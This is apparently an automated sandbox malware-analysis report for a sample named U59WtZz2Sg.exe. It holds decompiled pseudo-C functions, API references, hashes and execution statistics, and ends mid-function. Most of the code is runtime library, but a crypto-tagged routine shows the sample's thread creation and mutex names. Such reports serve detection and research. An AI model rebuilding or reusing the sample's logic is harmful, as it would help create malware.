HeapFree.KERNEL32(00000000,00404A65,004106E0,0000000C,00406AEA,00000000,00410880,0000000C,00406B24,00404A65,5E90BC38,eJ@,00407A16,00000004,004108A0,0000000C), ref: 004046FB
GetLastError.KERNEL32(?,00405922,00000001,00000214,?,00000000,00405EA2,00404A65,?,00000000,00000000,?,00403B80,00000000,00000000,00000000), ref: 0040470C

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 06155120b25273df7f580c65ebd01418ca93f3cb93434553740cd0d7a8969c00
Instruction ID: dfd1fc68d178f038beba324b1433e71fd4b94ee90a1168213d1e249d4d966e7e
Opcode Fuzzy Hash: 06155120b25273df7f580c65ebd01418ca93f3cb93434553740cd0d7a8969c00
Instruction Fuzzy Hash: 02018FB1901311AADF207F729C0AB4F3B64AF42728F11453FF641BA1E1DB3D99508A9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4DB Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040D4DB(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00403D7B( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040B6B0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00405E9D(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0040d4e5
0x0040d4ec
0x0040d503
0x00000000
0x0040d4f3
0x0040d4f5
0x0040d50f
0x0040d514
0x0040d517
0x0040d51a
0x0040d543
0x0040d54a
0x0040d54c
0x0040d5cd
0x0040d5e8
0x0040d5ea
0x0040d52a
0x0040d52a
0x0040d52d
0x0040d52f
0x0040d532
0x0040d532
0x0040d532
0x0040d532
0x00000000
0x0040d538
0x0040d5ac
0x0040d5ac
0x0040d5b1
0x0040d5b7
0x0040d5ba
0x0040d5bc
0x0040d5bf
0x0040d5bf
0x0040d5bf
0x0040d5bf
0x00000000
0x0040d5c3
0x0040d54e
0x0040d551
0x0040d557
0x0040d55a
0x0040d581
0x0040d584
0x0040d58a
0x00000000
0x00000000
0x0040d58c
0x0040d58f
0x00000000
0x00000000
0x0040d591
0x0040d591
0x0040d597
0x0040d59a
0x0040d508
0x0040d508
0x0040d5a3
0x00000000
0x0040d5a3
0x0040d55c
0x0040d55f
0x00000000
0x00000000
0x0040d563
0x0040d574
0x0040d57a
0x0040d57c
0x0040d57f
0x00000000
0x00000000
0x00000000
0x0040d57f
0x0040d51c
0x0040d51f
0x0040d521
0x0040d527
0x0040d527
0x00000000
0x0040d4f7
0x0040d4f7
0x0040d4fc
0x0040d500
0x0040d500
0x00000000
0x0040d4fc
0x0040d4f5

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040D50F
__isleadbyte_l.LIBCMT ref: 0040D543
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0040D574
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0040D5E2

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7225acf7204cfd63700596123431b1959b4cad442c473ba2f2d1a09301933e7a
Instruction ID: e299dfa11951d521a995e1aa5be62297915a22585868abe45635b7db1c89ca88
Opcode Fuzzy Hash: 7225acf7204cfd63700596123431b1959b4cad442c473ba2f2d1a09301933e7a
Instruction Fuzzy Hash: 1C31AE31E00256FFDB20DFA4CC849BA3BA5EF01318B15897AE861AB2D1E334DD45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405633 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00405633(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4107a8);
				E004065D4(__ebx, __edi, __esi);
				_t28 = E00405970(__ebx, _t25, __edi, _t30);
				_t13 =  *0x4a38cc; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00406B09(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x4a39b0; // 0x4a38d8
					 *((intOrPtr*)(_t29 - 0x1c)) = E004055F5(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0040569D();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00405970(_t22, _t25, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00407AE3(_t25, _t26, 0x20);
				}
				return E00406619(_t28);
			}

0x00405633
0x00405633
0x00405633
0x00405633
0x00405635
0x0040563a
0x00405644
0x00405646
0x0040564e
0x00405672
0x00405674
0x0040567a
0x0040567e
0x00405681
0x0040568c
0x0040568f
0x00405696
0x00405650
0x00405650
0x00405654
0x00000000
0x00405656
0x0040565b
0x0040565b
0x00405654
0x00405660
0x00405664
0x00405669
0x00405671

APIs

__getptd.LIBCMT ref: 0040563F

Part of subcall function 00405970: __getptd_noexit.LIBCMT ref: 00405973
Part of subcall function 00405970: __amsg_exit.LIBCMT ref: 00405980

__getptd.LIBCMT ref: 00405656
__amsg_exit.LIBCMT ref: 00405664
__lock.LIBCMT ref: 00405674

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 6da693aebd3262c224de879269926136b90a3c51ccc8978f4a917d57c9e041c2
Instruction ID: 69cdc1afe57b0e6a10b1346b36262c1586caea7127d4a2679d7bdc3852591324
Opcode Fuzzy Hash: 6da693aebd3262c224de879269926136b90a3c51ccc8978f4a917d57c9e041c2
Instruction Fuzzy Hash: 78F06D31940B04DBDA20BB668806B4B73A0EB00728F55457FA085B72D2DB7DAA018F5E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: U59WtZz2Sg.exePID: 3692, Parent PID: 5228COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.6%
Total number of Nodes:	702
Total number of Limit Nodes:	16

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, char _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, char _a72, intOrPtr _a80, char _a84, WCHAR* _a88, struct tagMSG _a92, intOrPtr _a100, int _a104, int _a108, char _a116, char _a120, WCHAR* _a124, char _a128, int _a144, int _a148, char _a160, char _a168, int _a176, int _a180, char _a192, char _a196, char _a200, int _a212, int _a216, int _a220, char _a228, char _a232, char _a240, int _a244, int _a248, char _a252, char _a256, struct tagMSG _a260, struct tagMSG _a264, int _a272, int _a276, char _a288, int _a292, char _a320, int _a336, int _a340, char _a368, short _a376, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a880, char _a884, short _a968, char _a984, char _a3248, short _a3252) {
				void* _v0;
				int _v4;
				char _v8;
				WCHAR** _v12;
				short* _v16;
				long _v20;
				CHAR* _v24;
				char _v28;
				char _v32;
				char _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t570;
				void* _t573;
				void* _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				short* _t846;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				WCHAR* _t989;
				signed int _t990;
				signed int _t991;
				WCHAR* _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				short* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				short* _t1231;
				char _t1232;
				char _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				short* _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x82ce58
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x0
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8)));
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									_t570 = E00412220(); // executed
									__eflags = _t570 - 1;
								} else {
									__eflags = E00412220() - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa); // executed
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272 = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200); // executed
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_push(0);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											_push(0);
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20);
											E0040D240( *(_t1230 + 0x8cc)); // executed
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v24);
												_t1268 = _t1268 + 4;
											}
											_t581 = _v0;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104 = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															_push(0);
															E00413FF0(_t950, _t1140, _t861);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW(0x51a7c0);
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags);
													 *0x529225 = _a16;
													 *0x529226 = _a28;
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0;
													if( *0x51a7c0 != 0) {
														_t989 = 0x51a7c0;
														_t201 =  &(_t989[1]); // 0x51a7c2
														_t1231 = _t201;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[1]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - _t1231;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205);
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0;
